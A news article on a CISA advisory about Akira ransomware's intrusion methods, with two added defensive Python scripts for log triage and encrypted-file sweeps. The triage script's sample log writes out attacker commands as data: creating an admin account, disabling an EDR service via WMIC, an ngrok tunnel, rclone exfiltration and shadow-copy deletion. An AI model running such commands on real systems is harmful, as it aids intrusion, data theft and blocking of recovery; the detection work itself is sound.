The Cybersecurity and Infrastructure Security Agency (CISA), along with the FBI and several international partners, has issued a new advisory warning organizations about the growing threat posed by the Akira ransomware group to critical infrastructure.
The latest update shows the ransomware group has expanded its capabilities beyond VMware ESXi and Hyper-V environments and is now targeting Nutanix AHV virtual machines as well.
While Akira initially focused on small and medium businesses in North America, Europe, and Australia, the group has increasingly shifted toward large enterprises, with recent incidents affecting organizations in manufacturing, information technology, healthcare, financial services, and food and agriculture.
“Akira’s expansion beyond Windows into Linux servers, VMware ESXi, Hyper-V, and now Nutanix AHV is not some side experiment. It is a very deliberate signal that this group is planning for the long haul. Multi-platform ransomware is expensive to build and even harder to maintain,” said Sanchit Vir Gogia, chief analyst and CEO at Greyhound Research.
As of late September 2025, Akira ransomware has claimed approximately $244.17 million in ransomware proceeds, noted CISA.
How Akira breaks in
To gain initial access, Akira threat actors exploited poorly secured virtual private network (VPN) services that lacked multi-factor authentication (MFA), using known vulnerabilities (CVEs) in products from vendors such as Cisco and SonicWall.
The techniques used include password spraying, spearphishing, abuse of valid credentials, and exploitation of external-facing services such as Remote Desktop Protocol (RDP). In some incidents, the group also gained access over Secure Shell (SSH) by exploiting a router’s IP address. After tunnelling through the targeted router, it exploited publicly available vulnerabilities, such as those in the Veeam Backup and Replication component of unpatched Veeam backup servers, the advisory noted.
Malicious commands were executed, including Visual Basic (VB) scripts. Akira threat actors used nltest /dclist: and nltest /DOMAIN_TRUSTS for network and domain discovery. In addition, to avoid detection, the group abused remote access tools such as AnyDesk and LogMeIn to maintain persistence and blend in with administrator activity. It leveraged Impacket’s wmiexec.py to execute commands remotely and also uninstalled endpoint detection and response (EDR) tools.
Threat actors also created new user accounts and added them to the administrator group to establish a foothold in the environment.
For command and control (C2) communications, it previously used two ransomware variants against different system architectures during one attempted compromise – Windows-specific “Megazord” ransomware and Akira ESXi encryptor, Akira_v2. However, Megazord has likely fallen out of use since 2024.
According to the new update, tunnelling utilities such as Ngrok are being used to initiate encrypted sessions that bypass perimeter monitoring. The group also uses PowerShell and Windows Management Instrumentation Command-line (WMIC) to disable services and execute malicious scripts.
Akira has been using tools such as FileZilla and WinRAR to collect and stage data, and WinSCP and RClone to exfiltrate it. After exfiltration, the group applies a double-extortion model: encrypting systems and threatening to leak the stolen sensitive information. The advisory noted that Akira threat actors were able to exfiltrate data in just over two hours from initial access.
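The behaviours in the preceding paragraphs (nltest discovery, new administrator accounts, AnyDesk, Impacket’s wmiexec.py, WMIC service tampering, Ngrok, RClone) all leave process-creation telemetry, as does the shadow copy deletion described further down. The following Python script is an added example, not code from the advisory or the article: it runs one rule per behaviour over a handful of constructed log lines and then correlates hits per host, since a single nltest run is routine administrator activity while a cluster of these behaviours on one host is not. The pipe-delimited log layout, the host and account names, and the EDR service name are assumptions; the wmiexec rule relies on that tool’s well-known habit of redirecting command output to a file under the ADMIN$ share.

```python
"""Process-creation log triage for the Akira tradecraft described above.

Added example, not code from the advisory or the article. The log format is
constructed for illustration; the field layout
    timestamp|host|user|parent_image|image|command_line
is an assumption, not any product's real schema. Each rule maps to one
behaviour the article names; the patterns are conservative starting points
to tune in a real SIEM, not a complete signature set.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    behaviour: str       # which part of the intrusion chain the rule covers
    pattern: re.Pattern  # searched against "<image> <command_line>", lower-cased


RULES = [
    Rule("domain_discovery_nltest", "network and domain discovery",
         re.compile(r"\bnltest(\.exe)?\b.*/(dclist|domain_trusts)")),
    Rule("local_user_created", "new local account created",
         re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+(\s+\S+)?\s+/add\b")),
    Rule("local_admin_added", "account placed in the local administrators group",
         re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\b.*\s/add\b")),
    Rule("remote_access_tool", "AnyDesk/LogMeIn used for persistence",
         re.compile(r"\b(anydesk|logmein)\w*\.exe\b")),
    # Impacket's wmiexec.py runs commands via cmd.exe /Q /c and redirects the
    # output to a file under \\127.0.0.1\ADMIN$; that shape is matched here.
    Rule("impacket_wmiexec", "remote command execution via Impacket wmiexec.py",
         re.compile(r"cmd\.exe\s+/q\s+/c\s+.*\\\\127\.0\.0\.1\\admin\$\\__")),
    Rule("wmic_service_disable", "WMIC used to stop or disable services",
         re.compile(r"\bwmic(\.exe)?\b.*\bservice\b.*\b(stopservice|changestartmode|delete)\b")),
    Rule("ngrok_tunnel", "Ngrok tunnel that bypasses perimeter monitoring",
         re.compile(r"\bngrok(\.exe)?\b")),
    Rule("exfil_tooling", "WinRAR/FileZilla staging or WinSCP/RClone exfiltration",
         re.compile(r"\b(rclone|winscp|winrar|rar|filezilla)(\.exe)?\b")),
    Rule("shadow_copy_deletion", "VSS shadow copies deleted to inhibit recovery",
         re.compile(r"(vssadmin(\.exe)?\s+delete\s+shadows|shadowcopy\s+delete"
                    r"|win32_shadowcopy.*\.delete\(\))")),
]

# Constructed sample telemetry; hosts, accounts and the EDR service name are placeholders.
SAMPLE_LOG = [
    "2025-09-28T02:14:03Z|FS01|CORP\\jdoe|C:\\Windows\\explorer.exe|C:\\Program Files\\Microsoft Office\\WINWORD.EXE|WINWORD.EXE /n Q3_report.docx",
    "2025-09-28T02:31:11Z|FS01|CORP\\svc_vpn|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\nltest.exe|nltest /dclist:",
    "2025-09-28T02:31:15Z|FS01|CORP\\svc_vpn|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\nltest.exe|nltest /DOMAIN_TRUSTS",
    "2025-09-28T02:40:52Z|FS01|CORP\\svc_vpn|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\net.exe|net user itadmin P@ssw0rd! /add",
    "2025-09-28T02:40:58Z|FS01|CORP\\svc_vpn|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\net.exe|net localgroup administrators itadmin /add",
    "2025-09-28T02:55:07Z|WS22|CORP\\itadmin|C:\\Windows\\explorer.exe|C:\\Users\\itadmin\\AppData\\Local\\AnyDesk\\AnyDesk.exe|AnyDesk.exe",
    "2025-09-28T03:02:44Z|DC01|CORP\\itadmin|C:\\Windows\\System32\\wbem\\WmiPrvSE.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1759024964.21 2>&1",
    "2025-09-28T03:10:19Z|FS01|CORP\\itadmin|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic service where name=\"SomeEDRSvc\" call changestartmode disabled",
    "2025-09-28T03:20:31Z|FS01|CORP\\itadmin|C:\\Windows\\explorer.exe|C:\\Temp\\ngrok.exe|ngrok.exe tcp 3389",
    "2025-09-28T04:05:12Z|FS01|CORP\\itadmin|C:\\Windows\\System32\\cmd.exe|C:\\Temp\\rclone.exe|rclone.exe copy D:\\Finance remote:staging",
    "2025-09-28T04:30:00Z|FS01|CORP\\itadmin|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -Command \"Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }\"",
]


def parse(line):
    """Split one constructed log line into a dict; None for a malformed line.
    maxsplit=5 keeps any '|' inside the command line in the last field."""
    parts = line.rstrip("\n").split("|", 5)
    if len(parts) != 6:
        return None
    return dict(zip(("ts", "host", "user", "parent", "image", "cmdline"), parts))


def triage(lines):
    """Return one hit per (event, rule) match, in log order."""
    hits = []
    for raw in lines:
        ev = parse(raw)
        if ev is None:
            continue
        haystack = f"{ev['image']} {ev['cmdline']}".lower()
        for rule in RULES:
            if rule.pattern.search(haystack):
                hits.append({"rule": rule.name, "behaviour": rule.behaviour, **ev})
    return hits


def hosts_with_chain(hits, min_distinct=3):
    """Hosts where several different behaviours fired. One match (an admin
    running nltest) is noise; a cluster on one host is the chain the advisory describes."""
    per_host = defaultdict(set)
    for h in hits:
        per_host[h["host"]].add(h["rule"])
    return sorted(host for host, rules in per_host.items() if len(rules) >= min_distinct)


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for h in found:
        print(f"{h['ts']} {h['host']:<5} {h['rule']:<24} {h['cmdline']}")
    print("hosts showing a multi-stage chain:", hosts_with_chain(found))
```

In production the same rules would sit on top of the command-line fields of Sysmon event 1 or Windows Security event 4688, and the correlation step would be bounded by a time window rather than spanning the whole log; the two-hour dwell time the advisory cites is the argument for keeping that window short.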
Akira threat actors use the ChaCha20 stream cipher together with an RSA public-key cryptosystem, a hybrid scheme that gives fast encryption and a secure key exchange. While encrypted files earlier appeared with a .akira or .powerranges extension, the new Akira_v2 variant also uses .akiranew or .aki.
To inhibit system recovery and impede forensic analysis, Akira’s encryptor (w.exe) used PowerShell commands to delete Volume Shadow Copy Service (VSS) copies on Windows systems. According to the new update, a ransom note named fn.txt or akira_readme.txt appears in both the root directory and each user’s home directory.
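The file extensions and ransom-note names above are the artefacts an incident responder can sweep for once encryption is suspected. Below is an added example, not code from the advisory or the article: a Python scan that counts files carrying the .akira, .powerranges, .akiranew and .aki extensions, locates fn.txt and akira_readme.txt, and checks for the root-plus-home-directory note placement the update describes. The sample tree it builds in a temporary directory is constructed, and its Windows-like layout (Users/<name>, Shares/...) is an assumption; point scan_tree at a real mount point to use it on a suspect volume.

```python
"""Filesystem sweep for the Akira encryption artefacts named above.

Added example, not code from the advisory or the article. It looks for the
four extensions the article attributes to Akira (.akira, .powerranges,
.akiranew, .aki) and the two ransom-note names (fn.txt, akira_readme.txt),
and checks whether notes sit in both the volume root and user home
directories. The sample tree is constructed in a temporary directory so the
script runs offline; its Windows-like layout is an assumption.
"""
import os
import tempfile
from collections import Counter
from dataclasses import dataclass, field
from pathlib import Path

ENCRYPTED_EXTENSIONS = {".akira", ".powerranges", ".akiranew", ".aki"}
RANSOM_NOTE_NAMES = {"fn.txt", "akira_readme.txt"}


@dataclass
class Report:
    ext_counts: Counter = field(default_factory=Counter)
    note_paths: list = field(default_factory=list)
    affected_dirs: set = field(default_factory=set)
    notes_in_root_and_homes: bool = False

    @property
    def encrypted_total(self) -> int:
        return sum(self.ext_counts.values())


def scan_tree(root: Path) -> Report:
    """Walk the tree once, collecting encrypted-extension counts, note paths and
    the directories holding encrypted files (relative, POSIX-style)."""
    root = root.resolve()
    report = Report()
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            if name.lower() in RANSOM_NOTE_NAMES:
                report.note_paths.append(path)
            suffix = path.suffix.lower()
            if suffix in ENCRYPTED_EXTENSIONS:
                report.ext_counts[suffix] += 1
                report.affected_dirs.add(path.parent.relative_to(root).as_posix())
    # The article describes notes in the root and in every user's home directory;
    # "Users/<name>" as the home location is the assumed Windows layout.
    users = root / "Users"
    in_root = any(p.parent == root for p in report.note_paths)
    in_home = any(users in p.parents and p.parent != users for p in report.note_paths)
    report.notes_in_root_and_homes = in_root and in_home
    return report


def severity(report: Report) -> str:
    """Coarse verdict: encrypted files plus notes means encryption ran; either
    alone still warrants investigation rather than dismissal."""
    if report.encrypted_total and report.note_paths:
        return "critical"
    if report.encrypted_total or report.note_paths:
        return "suspicious"
    return "clean"


def build_sample_tree(base: Path) -> None:
    """Constructed sample data: a miniature volume after a hypothetical encryption run."""
    files = [
        "fn.txt",                                   # note in the volume root
        "Users/alice/akira_readme.txt",             # note in a user's home directory
        "Users/alice/Documents/budget.xlsx.akira",
        "Users/alice/Documents/plan.docx.akiranew",
        "Users/bob/fn.txt",
        "Users/bob/Pictures/holiday.jpg.aki",
        "Shares/Finance/ledger.db.powerranges",
        "Shares/Finance/README.md",                 # benign
        "Windows/System32/notepad.exe",             # benign
    ]
    for rel in files:
        target = base / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(b"constructed sample content\n")


def run_demo() -> Report:
    """Build the sample tree in a temp dir, scan it and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    rep = run_demo()
    print("verdict:", severity(rep))
    print("encrypted files by extension:", dict(rep.ext_counts))
    print("ransom notes:", len(rep.note_paths), "root+home placement:", rep.notes_in_root_and_homes)
    print("affected directories:", sorted(rep.affected_dirs))
```

The per-directory list matters more than the total: it tells the responder which shares and home directories were reached, which in turn scopes both the restore and the data-leak assessment the double-extortion model forces.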
Threat that thrives in enterprise blind spots
Experts indicate that Akira leverages blind spots that enterprises acknowledge but rarely fix. Of these, remote access tops the list, followed by patching.
“Akira wins not because it has reinvented ransomware, but because it has perfected the parts enterprises fail to take seriously. It exploits the inertia around forgotten VPN appliances, under-patched firewalls, ageing backup servers, and edge devices that fall outside everyday security conversations. The threat is subtle, persistent, and designed to thrive in the grey areas that organisations neglect,” said Gogia.
Gogia noted that network appliances and backup platforms are often months or years behind on updates, which is why Akira regularly exploits Cisco ASA, SonicWall, ESXi, and Veeam vulnerabilities that should have been long closed.
Rethinking ransomware defence
While the standard guidance includes patching, MFA, and regular backups, the Akira wave drives home a clear need for additional defence mechanisms.
“In 2025 alone, Akira ransomware accounted for about 8–11% of all successful ransomware attacks globally, with a 38% increase in incident count and a notable expansion into multi-platform attack methods,” said Devroop Dhar, co-founder and MD at Primus Partner. “This versatility means simultaneous disruption of endpoints and core business infrastructure, demonstrating a calculated, long-term vision by Akira’s developers to match the complexity and hybrid nature of modern enterprise systems.”
“Best practice now means robust network segmentation to confine breaches, vigilant monitoring for unusual admin activity, and extending detection and response to backup servers, hypervisor consoles, and connected devices,” added Dhar.
Proactive threat hunting, strict privilege management, and rehearsed recovery plans are vital, too, noted Dhar.
Enterprises must also rehearse full-scale ransomware scenarios. “These exercises need to blend technical recovery with legal strategy, communication plans, and data leak contingencies. The organisations that withstand Akira are not the ones with the most tools. They are the ones that have integrated their defences, shortened their detection windows, and treated resilience as an operational discipline rather than an aspiration,” added Gogia.
Dhar added that thinking like an attacker is now an essential skill, and plugging the gaps before they are exploited is what stands between disruption and survival.